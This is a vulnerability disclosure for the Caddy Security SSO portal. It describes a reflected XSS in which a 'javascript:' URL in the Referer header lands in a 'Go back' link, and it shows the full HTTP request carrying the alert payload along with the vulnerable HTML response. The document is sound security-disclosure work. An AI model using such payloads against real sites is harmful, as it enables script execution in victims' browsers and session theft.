Referer-Based Header XSS

[ahpaleus]

Severity: Medium

An XSS vulnerability can be triggered by rewriting the Referer header. Although the Referer header is sanitized by escaping some characters that can allow XSS (e.g., [&], [<], [>], ["], [']), it does not account for the attack based on the JavaScript URL scheme (e.g., javascript:alert(document.domain)// payload). Exploiting this vulnerability may not be trivial, but it could lead to the execution of malicious scripts in the context of the target user’s browser, compromising user sessions.

GET /oauth2/google?state=AA HTTP/2
Host: portal.caddysecurity.network
Cookie: AUTHP_SESSION_ID=bgSUVN2uK7z8rCERZMiAnPPxZ9DOmfl5Hn7hCwZRTkc5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 stcl6szi3
Origin: https://stcl6szi3.com
Referer: javascript:alert(document.domain)//X

HTTP/2 401 Unauthorized
Cache-Control: no-store
Content-Type: text/html
Pragma: no-cache
Server: Fly/a0b91024 (2023-06-13)
Date: Wed, 19 Jul 2023 08:54:55 GMT
Content-Length: 2008
Via: 2 fly.io
Fly-Request-Id: 01H5PNR1Q9D43TKDNDXSRR2MNS-waw

<!DOCTYPE html>
<html lang="en" class="h-full bg-blue-100">
  <head>
    <title>Authentication Portal - Unauthorized</title>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="description" content="Performs user authentication." />
    <meta name="author" content="Paul Greenberg github.com/greenpau" />
    <link rel="shortcut icon" href="/assets/images/favicon.png" type="image/png" />
    <link rel="icon" href="/assets/images/favicon.png" type="image/png" />
    <link rel="stylesheet" href="/assets/google-webfonts/roboto.css" />
    <link rel="stylesheet" href="/assets/line-awesome/line-awesome.css" />
    <link rel="stylesheet" href="/assets/css/generic.css" />
    
  </head>

  <body class="h-full">
    <div class="app-page">
      <div class="app-content md:max-w-2xl lg:max-w-2xl">
        <div class="bg-white py-8 px-4 shadow-lg sm:rounded-lg sm:px-10">
          <div class="bg-white min-h-full px-4 py-16 sm:px-6 sm:py-24 md:grid md:place-items-center lg:px-8">
            <div class="max-w-max mx-auto">
              <main class="sm:flex">
                
                  <img class="logo-img" src="/assets/images/logo.svg" alt="Authentication Portal" />
                
                <div class="sm:ml-6">
                  <div class="app-gen-banner-box">
                    <h1 class="app-gen-banner-header">Unauthorized</h1>
                    <p class="app-gen-banner-message"><no value></p>
                  </div>
                  
                    <div class="app-gen-btn-box">
                      <a href="javascript:alert(document.domain)//X" class="app-gen-btn-txt"> Go back </a>
                    </div>
                  
                </div>
              </main>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- JavaScript -->
    <script src="/assets/js/generic.js"></script>
    
  </body>
</html>

The mitigation for this issue is identical to issue #264

More information about our Caddy Security public disclosure:

• https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/